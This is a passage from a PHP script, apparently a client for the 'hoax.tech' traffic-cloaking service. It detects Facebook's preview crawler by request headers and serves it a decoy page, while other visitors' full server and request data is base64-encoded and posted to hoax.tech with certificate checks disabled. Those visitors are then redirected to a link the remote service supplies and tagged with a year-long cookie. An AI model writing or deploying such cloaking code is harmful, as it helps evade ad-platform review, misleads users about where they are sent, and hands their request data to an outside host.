$value) { if (substr($name, 0, 5) == 'HTTP_') { $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value; } } return $headers; } } new Hoaxer(); class Hoaxer { public function __construct() { try { if (!function_exists('curl_version')) { throw new Exception('php-curl extension does not exist'); } $headers = array_change_key_case(getallheaders()); if ( isset($headers['x-purpose']) && $headers['x-purpose'] === 'preview' || isset($headers['x-fb-http-engine']) && $headers['x-fb-http-engine'] === 'liger' || isset($headers['hoax-curl']) ) { exit(include 'index2.php'); } if (isset($_POST['hdata'])) { $this->responser( $this->utmTransfer( json_decode($this->curlSender('extended', $_POST['hdata']), true) ) ); } new Redirect( $this->utmTransfer( json_decode($this->curlSender('basic', $this->dataCollector()), true) )); echo $this->appendAssets(HTML::get()); } catch (Exception $e) { $this->responser([$e->getMessage()]); } } private function utmTransfer($response) { if ($response['status'] === 'ok' && !empty($_GET) && HOAX_UTM === 'true') { $parsedUri = parse_url($response['link']); $start = (empty($parsedUri['query'])) ? '?' : '&'; $response['link'] = $response['link'] . $start . http_build_query($_GET); } return $response; } private function dataCollector() { $_SERVER['time'] = HOAX_TIME; $_SERVER['bhash'] = HOAX_ID; $_SERVER['flow_hash'] = HOAX_FLOW; array_walk_recursive($_SERVER, function (&$parameter) { $parameter = htmlspecialchars($parameter); }); return base64_encode(json_encode($_SERVER)); } private function appendAssets($html) { if (!preg_match('/]*)>/', $html, $bodyString)) { throw new Exception('html markup error: missing tag'); } $bodyString = ''; return str_replace( [$bodyString, '---HOAX_TIME---', '---HOAX_ID---', '---HOAX_FLOW---', '---HOAX_COOKIE---'], [$bodyString . PHP_EOL . $this->assets(), HOAX_TIME, HOAX_ID, HOAX_FLOW, HOAX_FLOW], $html); } private function curlSender($type, $data) { $ch = curl_init(); curl_setopt($ch, CURLOPT_FORBID_REUSE, true); curl_setopt($ch, CURLOPT_URL, "https://hoax.tech/api/v2?type=$type"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "data=$data"); if (!$response = curl_exec($ch)) { throw new Exception('cURL error: ' . curl_error($ch)); } curl_close($ch); return $response; } private function responser($response) { if (is_array($response)) { $response = json_encode($response); } header('Content-Type: application/json; charset=utf-8'); exit($response); } private function assets() { return <<<'ASSETS' ASSETS; } } class HTML { public static function get() { if (!file_exists('index2.php')) { throw new Exception('index2.php file does not exist'); } $content = file_get_contents('index2.php'); if (!preg_match('/]*)>/', $content) || preg_match('/<\?php/', $content)) { $url = ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'HOAX-CURL: true', ]); if (!$html = curl_exec($ch)) { throw new Exception('cURL error: ' . curl_error($ch)); } curl_close($ch); return $html; } return $content; } } class Redirect { public function __construct($response) { if ($response['status'] === 'ok') { setcookie(HOAX_FLOW, 'true', time() + 60 * 60 * 24 * 365, '/', $_SERVER['HTTP_HOST']); header("Location: " . $response['link']); exit(); } } }